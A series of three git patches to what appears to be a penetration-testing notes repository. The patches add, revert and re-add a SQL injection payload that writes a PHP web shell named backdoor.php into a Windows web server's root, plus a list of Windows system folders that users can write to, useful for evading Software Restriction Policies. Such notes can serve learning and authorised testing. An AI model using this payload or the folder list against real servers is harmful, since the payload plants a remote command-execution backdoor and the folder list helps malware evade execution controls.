From b63fd93e55ae2f81cccc534903c2383bcaa73669 Mon Sep 17 00:00:00 2001
From: Pierre ROSENZWEIG <p.rosenzweig@outlook.fr>
Date: Mon, 20 Jan 2020 23:46:12 +0100
Subject: [PATCH 1/3] add Windows writable folders & SQL RCE

---
 General/Shells.md     |  6 ++++++
 Windows/1-Overview.md | 19 +++++++++++++++++++
 2 files changed, 25 insertions(+)

diff --git a/General/Shells.md b/General/Shells.md
index 309872d..cb32745 100644
--- a/General/Shells.md
+++ b/General/Shells.md
@@ -846,6 +846,12 @@ Injection: Verified!
 Press [Enter] to continue...
 ```
 
+###### SQL Databases
+RCE upload through SQL injection in a Windows Web server
+```
+'; select "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';#
+```
+
 ###### Ebowla
 
 ### WinRM
diff --git a/Windows/1-Overview.md b/Windows/1-Overview.md
index 923bc2b..95b7df8 100644
--- a/Windows/1-Overview.md
+++ b/Windows/1-Overview.md
@@ -26,3 +26,22 @@ Releases:
 | 6.2 | 9200 | Windows 8 <br/> Windows Server 2012 |
 | **6.3** | **9600** | Windows 8.1 <br/> **Windows Server 2012 R2** |
 | **10.0** | 10240 (TH1) / 10586 (TH2) <br/> 14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10 <br/> Windows Server 2016 |
+
+--------------------------------------------------------------------------------
+### SRP: Protecting Windows Folder in Windows 10 (Software Restriction Policies)
+```
+C:\Windows\tracing
+C:\Windows\Registration\CRMLog
+C:\Windows\System32\FxsTmp
+C:\Windows\System32\com\dmp
+C:\Windows\System32\spool\PRINTERS
+C:\Windows\System32\spool\SERVERS
+C:\Windows\System32\drivers\color
+C:\Windows\System32\Tasks
+C:\Windows\SysWOW64\FxsTmp
+C:\Windows\SysWOW64\com\dmp
+C:\Windows\SysWOW64\Tasks
+C:\Windows\Tasks
+C:\Windows\Temp
+```
+Source : https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/

From 76acf031728f3b4bc6c6c9069d9428ab0ab7735e Mon Sep 17 00:00:00 2001
From: Pierre ROSENZWEIG <p.rosenzweig@outlook.fr>
Date: Mon, 20 Jan 2020 23:51:39 +0100
Subject: [PATCH 2/3] Revert "add Windows writable folders & SQL RCE"

This reverts commit b63fd93e55ae2f81cccc534903c2383bcaa73669.
---
 General/Shells.md     |  6 ------
 Windows/1-Overview.md | 19 -------------------
 2 files changed, 25 deletions(-)

diff --git a/General/Shells.md b/General/Shells.md
index cb32745..309872d 100644
--- a/General/Shells.md
+++ b/General/Shells.md
@@ -846,12 +846,6 @@ Injection: Verified!
 Press [Enter] to continue...
 ```
 
-###### SQL Databases
-RCE upload through SQL injection in a Windows Web server
-```
-'; select "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';#
-```
-
 ###### Ebowla
 
 ### WinRM
diff --git a/Windows/1-Overview.md b/Windows/1-Overview.md
index 95b7df8..923bc2b 100644
--- a/Windows/1-Overview.md
+++ b/Windows/1-Overview.md
@@ -26,22 +26,3 @@ Releases:
 | 6.2 | 9200 | Windows 8 <br/> Windows Server 2012 |
 | **6.3** | **9600** | Windows 8.1 <br/> **Windows Server 2012 R2** |
 | **10.0** | 10240 (TH1) / 10586 (TH2) <br/> 14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10 <br/> Windows Server 2016 |
-
---------------------------------------------------------------------------------
-### SRP: Protecting Windows Folder in Windows 10 (Software Restriction Policies)
-```
-C:\Windows\tracing
-C:\Windows\Registration\CRMLog
-C:\Windows\System32\FxsTmp
-C:\Windows\System32\com\dmp
-C:\Windows\System32\spool\PRINTERS
-C:\Windows\System32\spool\SERVERS
-C:\Windows\System32\drivers\color
-C:\Windows\System32\Tasks
-C:\Windows\SysWOW64\FxsTmp
-C:\Windows\SysWOW64\com\dmp
-C:\Windows\SysWOW64\Tasks
-C:\Windows\Tasks
-C:\Windows\Temp
-```
-Source : https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/

From 30979ff474d8f2659f883871c411eec8496fd576 Mon Sep 17 00:00:00 2001
From: Pierre ROSENZWEIG <p.rosenzweig@outlook.fr>
Date: Tue, 21 Jan 2020 00:00:39 +0100
Subject: [PATCH 3/3] windows writable path & RCE through MySQL

---
 General/Shells.md     |  5 +++++
 Windows/1-Overview.md | 22 ++++++++++++++++++++++
 2 files changed, 27 insertions(+)

diff --git a/General/Shells.md b/General/Shells.md
index 309872d..e5233b7 100644
--- a/General/Shells.md
+++ b/General/Shells.md
@@ -846,6 +846,11 @@ Injection: Verified!
 Press [Enter] to continue...
 ```
 
+###### SQL Database
+RCE upload through a SQL injection on a Windows Web Server
+```
+'; select "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';#
+```
 ###### Ebowla
 
 ### WinRM
diff --git a/Windows/1-Overview.md b/Windows/1-Overview.md
index 923bc2b..668bc2d 100644
--- a/Windows/1-Overview.md
+++ b/Windows/1-Overview.md
@@ -26,3 +26,25 @@ Releases:
 | 6.2 | 9200 | Windows 8 <br/> Windows Server 2012 |
 | **6.3** | **9600** | Windows 8.1 <br/> **Windows Server 2012 R2** |
 | **10.0** | 10240 (TH1) / 10586 (TH2) <br/> 14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10 <br/> Windows Server 2016 |
+
+---------------------------------------------------------------------------------------------------------------------------
+
+### SRP: Protecting Windows Folder in Windows 10
+List of Windows writable path :
+```
+C:\Windows\tracing
+C:\Windows\Registration\CRMLog
+C:\Windows\System32\FxsTmp
+C:\Windows\System32\com\dmp
+C:\Windows\System32\spool\PRINTERS
+C:\Windows\System32\spool\SERVERS
+C:\Windows\System32\drivers\color
+C:\Windows\System32\Tasks
+C:\Windows\SysWOW64\FxsTmp
+C:\Windows\SysWOW64\com\dmp
+C:\Windows\SysWOW64\Tasks
+C:\Windows\Tasks
+C:\Windows\Temp
+```
+
+[Source](https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/)